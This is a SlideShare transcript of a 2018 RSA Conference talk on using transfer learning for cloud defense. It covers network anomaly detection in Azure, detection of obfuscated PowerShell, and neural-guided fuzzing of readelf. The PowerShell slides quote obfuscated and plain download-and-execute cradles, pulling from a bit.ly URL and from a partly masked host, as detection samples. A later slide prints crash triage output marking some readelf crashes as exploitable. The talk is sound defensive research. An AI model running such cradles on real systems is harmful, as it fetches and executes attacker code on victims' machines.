SlideShare ist ein Scribd-Unternehmen logo

Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud Defense

Priyanka Aash
Priyanka Aash

Machine learning algorithms are key to modern at-scale cyberdefense. Transfer learning is a state of the art ML paradigm that enables applying knowledge and algorithms developed from one field to another, resulting in innovative solutions. This talk presents transfer learning in action wherein techniques created from other areas are successfully re-purposed and applied to cybersecurity. (Source: RSA Conference USA 2018)

Technologie
1 von 40
Downloaden Sie, um offline zu lesen
SESSION ID: #RSAC Mark Russinovich TRANSFER LEARNING: REPURPOSING ML ALGORITHMS FROM DIFFERENT DOMAINS TO CLOUD DEFENSE CSV-W02 CTO, Microsoft Azure Microsoft @markrussinovich
#RSAC Leveraging intelligence across product lines SQL Server + R Microsoft R Server Hadoop + R Spark + R Azure Machine Learning Cortana Intelligence Suite R Tools/Python Tools for Visual Studio Azure Notebooks (JuPyTer) Cognitive Services Bot Framework Cortana Office 365 Bing SkypeHoloLens R Server Microsoft CNTK Xbox 360 Dynamics 365
#RSAC Microsoft’s cloud security scale - Daily numbers 500 Million Number of active Microsoft account users 18 Billion Microsoft Account authentications 77 Million Threats detected on devices 30 Million Geo Login Anomaly Attacks deflected 1.5 Million Number of compromise attempts deflected
#RSAC
#RSAC Textbook ML development Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions
#RSAC Textbook ML development Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions
#RSAC Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Fact | Industry grade ML solutions are highly exploratory Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Attempt 1 Attempt 2 Attempt 3 Attempt 4 Attempt n
#RSAC Product Managers Machine Learning Experts Security Experts Assess security landscape and identify monitoring opportunities Update solution based on customer feedback Gather customer feedback and improve product Compliance and Privacy Ops Engineers Engineers Engineer for low latency, high throughput and scale Monitor performance and mitigate, resolve, preempt outages Ensure solution is compliant to privacy laws Fact | Industry grade security data science requires multiple experts
#RSAC
#RSAC Traditional versus Transfer learning Learning system Learning system Learning system Different tasks Traditional Machine Learning Transfer Learning Source tasks Learning system Target task Source: Pan, Sinno Jialin, and Qiang Yang. "A survey on transfer learning." IEEE Transactions on knowledge and data engineering
#RSAC Why transfer learning Commercial success Time 2016 Supervised learning Transfer learning Unsupervised learning Reinforcement learning Drivers of ML success in industry Source: Ruder, Sebastian, “Transfer Learning - Machine Learning's Next Frontier
#RSAC Problem Build a generic approach to detecting malicious incoming network activity that works for all protocols Hypothesis Underlying network protocols, though different, have similar behavior Solution Detect Attacker IPs using Ensemble Tree Learning Previous No previous approach for generic protocol suspicious activity for Cloud VM Case Study 1 | Detecting malicious network activity in Azure Core Concept: Achieve transfer learning by grouping similar tasks
#RSAC Ensemble Tree Learning applications at Microsoft
#RSAC To get labels compare Input data Description Number of outgoing SYN in short interactions (log) Number of outgoing SYN in short interactions Total percent outgoing SYN Percent outgoing SYN in short interactions Number of incoming FIN Distinct incoming connections relative to total flows Frequency of top most used port Hourly standard deviation of destination IPs Percent of outgoing SYN in long interactions (log) Number of outgoing SYN Number of flows on low frequency (rare) ports Percent of outgoing FIN messages Ratio of outgoing to incoming flows (TCP) Ratio of outgoing to incoming flows (total) Total number outgoing SYN Features extractedIPFix data from Azure VMs IP address in the IPFix data: 10.2.3.40 3rd party threat intelligence feeds Cyber Defense Operation Threat Intelligence Center MSRC Previous Red team activities If an IP from IPFix data is also present in TI feeds, label flow as malicious
#RSAC Tree Ensembles – Algorithm Create subsets from the training data by randomly sampling with replacement Nexamples M features
#RSAC Tree Ensembles – Training Rare Ports Flows Number of Outgoing SYN Frequency of Top Port Number of Incoming Flows Standard Deviation of IPs Number of Incoming FIN Malicious MaliciousBenign MaliciousBenign MaliciousBenign Nexamples M features
#RSAC Tree Ensembles – Training Standard Deviation of IPs Number of Outgoing SYN Frequency of Top Port Number of Incoming FIN Malicious MaliciousBenign Benign Benign Nexamples M features
#RSAC Tree EnsemblesNexamples M features
#RSAC Take the majority vote of the ensemble New Record Tree Ensembles – Testing Malicious Benign Benign Src Ip Dst IP Src Port DST Port In Int Out Int DSCP Octets 10.1.1.5 10.2.2.8 2887 80 Eth0 Eth1 00 982
#RSAC Model performance and productization Model trained at regular intervals Size of data: 3GB/hour Communication with 5 Million different IPs per hour Completed within seconds Classification runs multiple times a day Completed within milliseconds Dataset True positive rate False positive rate Non Ensemble Learning 82% 0.06% Ensemble Learning 85% 0.06% Azure Security Center3 points improvement
#RSAC Bonus Classifier can be used as an effective canary for emerging attacks #ofdetectedsuspiciousMongoDBscans http://www.zdnet.com/article/mongodb-ransacked-now-27000-databases-hit-in-mass-ransom-attacks/ Time (days)
#RSAC WannaCry Attack Timeline 1. Prior to the MS017-10 patch release, the SMB (port 445) scanning activity in Azure behaved per the standard baseline – i.e. sporadic incoming scans 2. Once released, we can notice a gradual increase in the number of successful scans (i.e. target responded) due to: a. Official Microsoft patch being released – I.e. A small group of reverse engineers uncovered the bug b. Metasploit module released to the public, making it easier to discover and exploit the vulnerability c. Shadow Broker tool leaked, improving the Metasploit attack module and making it more widespread 3. A week before the attack, we can notice a sharp peak in the number of successful incoming scans over SMB – signaling a significant interest in the SMB protocol #ofdetectedsuspiciousSMBscans Any targeted attacked here? Standard SMB (445) Azure scanning activity 1 Increased SMB (445) Azure scanning activity 2 Abnormal peak in scanning 3 MS017-10 Patch released Metasploit exploit released Shadow Broker exploiter leak A week before the attack Attack started Time (days)
#RSAC Case Study 2 | Detecting Malicious PowerShell commands Problem Statement Detect malicious PowerShell command lines Hypothesis Deep learning methods are capable of efficient and precise detection of malicious PowerShell commands Solution Collect large data set from Microsoft Defender and apply Microsoft’s Deep Learning toolkit (CNTK) for detection Previous Used machine learning (3-gram sequence modeling) Results: True positive rate = 89% Core Concept: Transposing existing security problem into an already solved problem from another domain
#RSAC PowerShell command lines – difficult to detect &( "I"+ "nv" +"OK"+"e-EXPreSsIon" ) (&( "new-O"+ "BJ"+"Ect") ('Net' +'.We'+'bClient' ) ).( 'dOWnlO' +'aDS'+'TrinG').Invoke( ('http://bi'+'t.ly/'+'L3' +'g1t' )) Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t') Source: Bohannon, Daniel. “Invoke Obfuscation”, BlueHat 2016. Command line: before obfuscation Command line: after obfuscation Rules don’t work well, because too many regexes needs to be written Classical machine learning doesn’t work well, because every command line is unique No discernable pattern
#RSAC
#RSAC Windows Defender ATP logging Machine Detonation Collected Log Hash Machine Timestamp Command line Malicious file Dataset
#RSAC Microsoft’s Deep Learning toolkit (CNTK) applications
#RSAC Deeper learning = representation learning Deep learning network Input layer Hidden layer 1 Hidden layer 2 Hidden layer 3 Output layer
#RSAC Deep learning system trained for image recognition "-ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'*bs*.exe';(New-Object Net.WebClient).DownloadFile('http://*pf*.top /http/',$uytcccs);Start-Process $uytcccs" & { (get- date).ToUniversalTime().ToString('yyyy-MM- dd-HH:mm:ss.fff') } Convert PowerShell commands to images Technique overview
#RSAC Model performance and productization 6 points improvement! Model trained in regular intervals Size of data: 400GB per day Completed within minutes Classification runs multiple times a day Completed within seconds Dataset True positive rate False positive rate Previous method 89% 0.004% Deep learning 95.7% 0.004%
#RSAC Case Study 3 | Neural Fuzzing Problem Statement Fuzz-testing file parsers to discover security vulnerabilities Hypothesis Fuzz testing heuristics can be learned and generalized from an existing graybox fuzzer. Some control locations are more interesting to fuzz than others. Solution Insert a neural model in the fuzz/test feedback loop. Learn and generalize a strategy from an existing fuzzer (AFL), using sequence to sequence neural architectures. Augment original fuzzer with generalized strategy. Previous Blackbox fuzzing: e.g. random mutations Whitebox fuzzing: e.g. dynamic analysis Graybox fuzzing: human crafted mutation heuristics aimed at maximizing code coverage Core Concept: Transposing existing security problem into an already solved problem from another domain
#RSAC Seq2Seq Neural Architecture Cortana Microsoft Translator
#RSAC Improved fuzzing intuition Model Input: Mutated files that have increased code coverage Encode input file content as a sequence of bytes Train with neural network architectures good at handling variable length sequences: LSTM, sequence-to-sequence Learned function Heatmaps of “usefulness” rating for each bit location in the input file Scoring Measured as potential to help discover new code paths 1 = mutation at this location will likely help discover new code paths 0 = ignore file location from mutation
#RSAC readelf dataset example 180 input files divided into training and validation sets 24h run of AFL on training set Training data collected Mutated files generated by AFL Code-coverage bitmaps from execution of the target program on mutated inputs Sampled at 1% Training Validation ~200kb per file
#RSAC Example | readelf 2.28 model Heatmap produced for one given ELF file Red locations are deemed interesting to mutate ELF Header format (Source: Wikipedia) … … … … 0x3A 2 e_shentsize size of a section header table entry. 0x3C 2 e_shnum number of entries in the section header table. 0x3E 2 e_shstrndx index of the section header table entry that contains the section names.
#RSAC
#RSAC Analysis by GDB exploitable plugin https://github.com/jfoote/exploitable Target: Linux readelf 2.28 Program received signal SIGSEGV, Segmentation fault. 0x000000000055e30b in byte_put_little_endian (field=0x1007dd6f6 <error: Cannot access memory at address 0x1007dd6f6>, value=0, size=2) at elfcomm.c:81 Description: Access violation on destination operand Short description: DestAv (8/22) Hash: 23ebf3e1c7d53d629ee996b7a33e133e.eddea00d61e72e006d47dab261ea1f05 Exploitability Classification: EXPLOITABLE Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. Other tags: AccessViolation (21/22) Program received signal SIGSEGV, Segmentation fault. 0x000000000045a9f3 in target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>, reloc=0x7ddfb8) at readelf.c:11629 Description: Access violation on source operand Short description: SourceAv (19/22) Hash: 6f55d3fddb7262be6e31745ee2574742.d27dd344b9a2892fc0d4d4f739f2f639 Exploitability Classification: UNKNOWN Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation. Other tags: AccessViolation (21/22) Program received signal SIGSEGV, Segmentation fault. 0x000000000055e283 in byte_put_little_endian (field=0xff000000007de2f2 <error: Cannot access memory at address 0xff000000007de2f2>, value=18446744073709551611, size=4) at elfcomm.c:75 Description: Access violation Short description: AccessViolation (21/22) Hash: 5a23cb8faf4189a00a5872ce9565218c.5de26e356c24993825d74ceade27e81f Exploitability Classification: UNKNOWN Explanation: The target crashed due to an access violation but there is not enough additional information available to determine exploitability. Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 Description: Heap error Short description: HeapError (10/22) Hash: cc68e1a9699d9946c2efe4adb95e6f13.f6583f17f75906da3c88b0cd8e5d6c7a Exploitability Classification: EXPLOITABLE Explanation: The target's backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable. Other tags: AbortSignal (20/22) Program received signal SIGSEGV, Segmentation fault. target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>, reloc=0x7dd828) at readelf.c:11666 Description: Access violation near NULL on source operand Short description: SourceAvNearNull (16/22) Hash: e0167387d6ee8286447199f310e69c4d.faf899c223c7d3c22b94eba413b011f8 Exploitability Classification: PROBABLY_NOT_EXPLOITABLE Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a s imple NULL dereference to data structure that has no immediate effect on control of the processor. Other tags: AccessViolation (21/22) Program received signal SIGSEGV, Segmentation fault. target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>, reloc=0x7dde40) at readelf.c:11695 Description: Access violation near NULL on source operand Short description: SourceAvNearNull (16/22) Hash: 73ce00dc337b153d0ecef457ecb08164.37705e2795c3218a99249070847f80f8 Exploitability Classification: PROBABLY_NOT_EXPLOITABLE Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a s imple NULL dereference to data structure that has no immediate effect on control of the processor. Other tags: AccessViolation (21/22) CVE-2017-6965 6 crash sites: 2 EXPLOITABLE, 2 UNKNOWN, 2 NOT EXPLOITABLE Found by Neural AFL but not standard AFL | All fixed in readelf 2.30
#RSAC Readelf model performance over 48h and productization Model trained Size of data: 20 GB Collected from: a 24h fuzzing run of AFL Completed within: 12h Model query AFL modified to query model 50% of the time Dataset Unique Code Paths Number of Crashes AFL 8,123 1 Neural 9,207 62 Bugs reproduced, triaged, and reported automatically in MSRD web portal for software being tested (https://www.microsoft.com/en-us/security-risk-detection/)
#RSAC Conclusion • Transfer Learning helps • To reuse already developed algorithms in an organization • To conserve resources across projects • Three Early Attempts at Transfer Learning: • Detecting Malicious Network Activity in Azure • Detecting Obfuscated PowerShell command lines • Fuzzing using Neural Nets
#RSAC Resources • Microsoft Booth at RSA • Experiment with Transfer Learning - https://docs.microsoft.com/en-us/cognitive- toolkit/Build-your-own-image-classifier-using-Transfer-Learning • Publications: • Detecting Obfuscated PowerShell - https://arxiv.org/pdf/1804.04177.pdf • Neural Fuzzing - https://www.microsoft.com/en-us/research/publication/not-all- bytes-are-equal-neural-byte-sieve-for-fuzzing/ • Free Online Training: • Azure Security and Compliance (edX) - https://www.edx.org/course/azure-security- and-compliance • Microsoft Professional Program For AI https://academy.microsoft.com/en- us/professional-program/tracks/artificial-intelligence/

Empfohlen

FIM and System Call Auditing at Scale in a Large Container Deployment
FIM and System Call Auditing at Scale in a Large Container DeploymentFIM and System Call Auditing at Scale in a Large Container Deployment
FIM and System Call Auditing at Scale in a Large Container DeploymentPriyanka Aash
 
Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”Priyanka Aash
 
Pragmatic Security Automation for Cloud
Pragmatic Security Automation for CloudPragmatic Security Automation for Cloud
Pragmatic Security Automation for CloudPriyanka Aash
 
Humans and Data Don’t Mix: Best Practices to Secure Your Cloud
Humans and Data Don’t Mix: Best Practices to Secure Your CloudHumans and Data Don’t Mix: Best Practices to Secure Your Cloud
Humans and Data Don’t Mix: Best Practices to Secure Your CloudPriyanka Aash
 
Ephemeral DevOps: Adventures in Managing Short-Lived Systems
Ephemeral DevOps: Adventures in Managing Short-Lived SystemsEphemeral DevOps: Adventures in Managing Short-Lived Systems
Ephemeral DevOps: Adventures in Managing Short-Lived SystemsPriyanka Aash
 
Building and Adopting a Cloud-Native Security Program
Building and Adopting a Cloud-Native Security ProgramBuilding and Adopting a Cloud-Native Security Program
Building and Adopting a Cloud-Native Security ProgramPriyanka Aash
 
Cloud security : Automate or die
Cloud security : Automate or dieCloud security : Automate or die
Cloud security : Automate or diePriyanka Aash
 
Incident response-in-the-cloud
Incident response-in-the-cloudIncident response-in-the-cloud
Incident response-in-the-cloudPriyanka Aash
 

Empfohlen

FIM and System Call Auditing at Scale in a Large Container Deployment
FIM and System Call Auditing at Scale in a Large Container DeploymentFIM and System Call Auditing at Scale in a Large Container Deployment
FIM and System Call Auditing at Scale in a Large Container DeploymentPriyanka Aash
 
Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”Priyanka Aash
 
Pragmatic Security Automation for Cloud
Pragmatic Security Automation for CloudPragmatic Security Automation for Cloud
Pragmatic Security Automation for CloudPriyanka Aash
 
Humans and Data Don’t Mix: Best Practices to Secure Your Cloud
Humans and Data Don’t Mix: Best Practices to Secure Your CloudHumans and Data Don’t Mix: Best Practices to Secure Your Cloud
Humans and Data Don’t Mix: Best Practices to Secure Your CloudPriyanka Aash
 
Ephemeral DevOps: Adventures in Managing Short-Lived Systems
Ephemeral DevOps: Adventures in Managing Short-Lived SystemsEphemeral DevOps: Adventures in Managing Short-Lived Systems
Ephemeral DevOps: Adventures in Managing Short-Lived SystemsPriyanka Aash
 
Building and Adopting a Cloud-Native Security Program
Building and Adopting a Cloud-Native Security ProgramBuilding and Adopting a Cloud-Native Security Program
Building and Adopting a Cloud-Native Security ProgramPriyanka Aash
 
Cloud security : Automate or die
Cloud security : Automate or dieCloud security : Automate or die
Cloud security : Automate or diePriyanka Aash
 
Incident response-in-the-cloud
Incident response-in-the-cloudIncident response-in-the-cloud
Incident response-in-the-cloudPriyanka Aash
 
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & RecoveryCLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & RecoveryPriyanka Aash
 
SDN and Security: A Marriage Made in Heaven. Or Not.
SDN and Security: A Marriage Made in Heaven. Or Not.SDN and Security: A Marriage Made in Heaven. Or Not.
SDN and Security: A Marriage Made in Heaven. Or Not.Priyanka Aash
 
Identity-Based Security and Privacy for the Internet of Things
Identity-Based Security and Privacy for the Internet of ThingsIdentity-Based Security and Privacy for the Internet of Things
Identity-Based Security and Privacy for the Internet of ThingsPriyanka Aash
 
Serverless Attack Vectors
Serverless Attack VectorsServerless Attack Vectors
Serverless Attack VectorsTeri Radichel
 
Are You Ready for a Cloud Pentest?
Are You Ready for a Cloud Pentest?Are You Ready for a Cloud Pentest?
Are You Ready for a Cloud Pentest?Teri Radichel
 
Packet Capture on AWS
Packet Capture on AWSPacket Capture on AWS
Packet Capture on AWSTeri Radichel
 
Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018Teri Radichel
 
Alfredo Reino - Monitoring aws and azure
Alfredo Reino - Monitoring aws and azureAlfredo Reino - Monitoring aws and azure
Alfredo Reino - Monitoring aws and azureDevSecCon
 
Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018Teri Radichel
 
(SACON 2020) Adventures In SDN Security
(SACON 2020) Adventures In SDN Security(SACON 2020) Adventures In SDN Security
(SACON 2020) Adventures In SDN SecurityPriyanka Aash
 
Android Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedAndroid Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedPriyanka Aash
 
PyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with PythonPyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with PythonMoses Schwartz
 
Managed Threat Detection and Response
Managed Threat Detection and ResponseManaged Threat Detection and Response
Managed Threat Detection and ResponseAlert Logic
 
You Build It, You Secure It: Introduction to DevSecOps
You Build It, You Secure It: Introduction to DevSecOpsYou Build It, You Secure It: Introduction to DevSecOps
You Build It, You Secure It: Introduction to DevSecOpsSumo Logic
 
Smart Megalopolises. How Safe and Reliable Is Your Data?
Smart Megalopolises. How Safe and Reliable Is Your Data?Smart Megalopolises. How Safe and Reliable Is Your Data?
Smart Megalopolises. How Safe and Reliable Is Your Data?Priyanka Aash
 
AWS temporary credentials challenges in prevention detection mitigation
AWS temporary credentials challenges in prevention detection mitigationAWS temporary credentials challenges in prevention detection mitigation
AWS temporary credentials challenges in prevention detection mitigationJohn Varghese
 
An experiment in agile threat modelling
An experiment in agile threat modellingAn experiment in agile threat modelling
An experiment in agile threat modellingDevSecCon
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Alert Logic
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android BotPriyanka Aash
 
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic WebinarMaking the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic WebinarSumo Logic
 
Advances in cloud scale machine learning for cyber-defense
Advances in cloud scale machine learning for cyber-defenseAdvances in cloud scale machine learning for cyber-defense
Advances in cloud scale machine learning for cyber-defensePriyanka Aash
 
Intelligent Monitoring
Intelligent MonitoringIntelligent Monitoring
Intelligent MonitoringIntelie
 

Weitere ähnliche Inhalte

Was ist angesagt?

CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & RecoveryCLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & RecoveryPriyanka Aash
 
SDN and Security: A Marriage Made in Heaven. Or Not.
SDN and Security: A Marriage Made in Heaven. Or Not.SDN and Security: A Marriage Made in Heaven. Or Not.
SDN and Security: A Marriage Made in Heaven. Or Not.Priyanka Aash
 
Identity-Based Security and Privacy for the Internet of Things
Identity-Based Security and Privacy for the Internet of ThingsIdentity-Based Security and Privacy for the Internet of Things
Identity-Based Security and Privacy for the Internet of ThingsPriyanka Aash
 
Serverless Attack Vectors
Serverless Attack VectorsServerless Attack Vectors
Serverless Attack VectorsTeri Radichel
 
Are You Ready for a Cloud Pentest?
Are You Ready for a Cloud Pentest?Are You Ready for a Cloud Pentest?
Are You Ready for a Cloud Pentest?Teri Radichel
 
Packet Capture on AWS
Packet Capture on AWSPacket Capture on AWS
Packet Capture on AWSTeri Radichel
 
Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018Teri Radichel
 
Alfredo Reino - Monitoring aws and azure
Alfredo Reino - Monitoring aws and azureAlfredo Reino - Monitoring aws and azure
Alfredo Reino - Monitoring aws and azureDevSecCon
 
Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018Teri Radichel
 
(SACON 2020) Adventures In SDN Security
(SACON 2020) Adventures In SDN Security(SACON 2020) Adventures In SDN Security
(SACON 2020) Adventures In SDN SecurityPriyanka Aash
 
Android Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedAndroid Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedPriyanka Aash
 
PyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with PythonPyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with PythonMoses Schwartz
 
Managed Threat Detection and Response
Managed Threat Detection and ResponseManaged Threat Detection and Response
Managed Threat Detection and ResponseAlert Logic
 
You Build It, You Secure It: Introduction to DevSecOps
You Build It, You Secure It: Introduction to DevSecOpsYou Build It, You Secure It: Introduction to DevSecOps
You Build It, You Secure It: Introduction to DevSecOpsSumo Logic
 
Smart Megalopolises. How Safe and Reliable Is Your Data?
Smart Megalopolises. How Safe and Reliable Is Your Data?Smart Megalopolises. How Safe and Reliable Is Your Data?
Smart Megalopolises. How Safe and Reliable Is Your Data?Priyanka Aash
 
AWS temporary credentials challenges in prevention detection mitigation
AWS temporary credentials challenges in prevention detection mitigationAWS temporary credentials challenges in prevention detection mitigation
AWS temporary credentials challenges in prevention detection mitigationJohn Varghese
 
An experiment in agile threat modelling
An experiment in agile threat modellingAn experiment in agile threat modelling
An experiment in agile threat modellingDevSecCon
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Alert Logic
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android BotPriyanka Aash
 
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic WebinarMaking the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic WebinarSumo Logic
 

Was ist angesagt? (20)

CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & RecoveryCLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
 
SDN and Security: A Marriage Made in Heaven. Or Not.
SDN and Security: A Marriage Made in Heaven. Or Not.SDN and Security: A Marriage Made in Heaven. Or Not.
SDN and Security: A Marriage Made in Heaven. Or Not.
 
Identity-Based Security and Privacy for the Internet of Things
Identity-Based Security and Privacy for the Internet of ThingsIdentity-Based Security and Privacy for the Internet of Things
Identity-Based Security and Privacy for the Internet of Things
 
Serverless Attack Vectors
Serverless Attack VectorsServerless Attack Vectors
Serverless Attack Vectors
 
Are You Ready for a Cloud Pentest?
Are You Ready for a Cloud Pentest?Are You Ready for a Cloud Pentest?
Are You Ready for a Cloud Pentest?
 
Packet Capture on AWS
Packet Capture on AWSPacket Capture on AWS
Packet Capture on AWS
 
Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018
 
Alfredo Reino - Monitoring aws and azure
Alfredo Reino - Monitoring aws and azureAlfredo Reino - Monitoring aws and azure
Alfredo Reino - Monitoring aws and azure
 
Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018
 
(SACON 2020) Adventures In SDN Security
(SACON 2020) Adventures In SDN Security(SACON 2020) Adventures In SDN Security
(SACON 2020) Adventures In SDN Security
 
Android Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedAndroid Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities Revisited
 
PyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with PythonPyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with Python
 
Managed Threat Detection and Response
Managed Threat Detection and ResponseManaged Threat Detection and Response
Managed Threat Detection and Response
 
You Build It, You Secure It: Introduction to DevSecOps
You Build It, You Secure It: Introduction to DevSecOpsYou Build It, You Secure It: Introduction to DevSecOps
You Build It, You Secure It: Introduction to DevSecOps
 
Smart Megalopolises. How Safe and Reliable Is Your Data?
Smart Megalopolises. How Safe and Reliable Is Your Data?Smart Megalopolises. How Safe and Reliable Is Your Data?
Smart Megalopolises. How Safe and Reliable Is Your Data?
 
AWS temporary credentials challenges in prevention detection mitigation
AWS temporary credentials challenges in prevention detection mitigationAWS temporary credentials challenges in prevention detection mitigation
AWS temporary credentials challenges in prevention detection mitigation
 
An experiment in agile threat modelling
An experiment in agile threat modellingAn experiment in agile threat modelling
An experiment in agile threat modelling
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android Bot
 
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic WebinarMaking the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
 

Ähnlich wie Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud Defense

Advances in cloud scale machine learning for cyber-defense
Advances in cloud scale machine learning for cyber-defenseAdvances in cloud scale machine learning for cyber-defense
Advances in cloud scale machine learning for cyber-defensePriyanka Aash
 
Intelligent Monitoring
Intelligent MonitoringIntelligent Monitoring
Intelligent MonitoringIntelie
 
Splunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk
 
Accelerating Cyber Threat Detection With GPU
Accelerating Cyber Threat Detection With GPUAccelerating Cyber Threat Detection With GPU
Accelerating Cyber Threat Detection With GPUJoshua Patterson
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022lior mazor
 
AI for Cybersecurity Innovation
AI for Cybersecurity InnovationAI for Cybersecurity Innovation
